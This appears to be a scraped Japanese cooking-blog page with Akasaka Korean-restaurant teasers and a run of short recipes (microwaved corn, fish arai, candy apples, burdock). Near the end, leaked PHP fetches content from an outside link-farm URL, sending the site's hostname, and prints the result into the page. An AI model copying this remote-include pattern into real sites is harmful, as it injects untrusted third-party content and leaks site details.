前へ
次へ

韓国料理を和風にする方法ってあるの

韓国料理は大好きだけど、匂いがきになるし、味が濃いから沢山食べられないという方おられませんか?実は、

more

赤坂で韓国料理店を探しましょう

私は赤坂にある会社に勤めています。いつもランチは同僚と近くのお店に行っています。その日の気分に合わせ

more

寒い冬には赤坂で韓国料理のチゲなべを

赤坂などの韓国料理のお店にも必ずあるチゲなべ。寒い冬などは体が暖まる美味しい料理です。みんなで食べれ

more

トウモロコシの電子レンジを利用した調理法

トウモロコシは鍋で茹でるのが昔ながらの調理法ですが、電子レンジで加熱をしても美味しく仕上げることができます。皮つきならば剥かないでレンジで加熱をしますが、その方が甘みが増すためです。500Wの電子レンジで皮つきのままで、およそ5分ほど加熱をします。皮無しの場合がラップで周りを包み込んで、同じようにレンジで5分間加熱したら出来上がりです。簡単に皮つきトウモロコシの皮をはぐために、最初に根と実の部分を切り落としておきます。魚のあらいというとは水で洗う料理ですが、魚の持つ活きの良さを引き出して味わうための料理です。新鮮な魚は弾力もコリコリとしており、身もキュッと引き締まっています。独自の調理法となる氷水で振り洗いをしたり、流水に魚のそぎ切りを打たせるような方法に由来しているのも、魚のあらいです。刺身を洗うとなると驚きますが、身を洗うことにより鮮度の良い魚は、程よく身が引き締まってより食感が良くなります。お祭りの屋台で見かけるりんご飴はとても美味しそうですが、調理法は難しくはなく、自宅でも作ることができます。シャキシャキのリンゴの食感と、周りをコーティングする、パリパリの飴とのハーモニーを自宅で楽しむことが可能です。洗って乾かしたりんごに割りばしを差して、鍋に水と砂糖を入れて加熱します。とろみがついたら加熱をやめて、赤い色を付けるために食紅を加えて混ぜ合わせ、リンゴを回しながら、とかした砂糖水の飴に入れてコーティング、粗熱をバットでとって固まったら出来上がりです。ささがきゴボウの煮ものはシャキシャキしていておいしいですが、調理法は炒めて煮るだけなので、思いのほかすぐに作ることができます。少し手間がかかるのは加熱をする段階前の、ささがきにする過程です。笹の葉のようにゴボウを薄く切りますが、その際に長細く切らなければなりません。包丁を上手に使い、剃るようにしてゴボウを回しながら切っていきます。ゴボウは最初に縦方向に切り込みを入れて、包丁の刃先をうまく斜めにいれて、手元に気を漬けながら薄く剃るように切っていくと簡単です。

".file_get_contents('http://links-001.com/kanren8set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top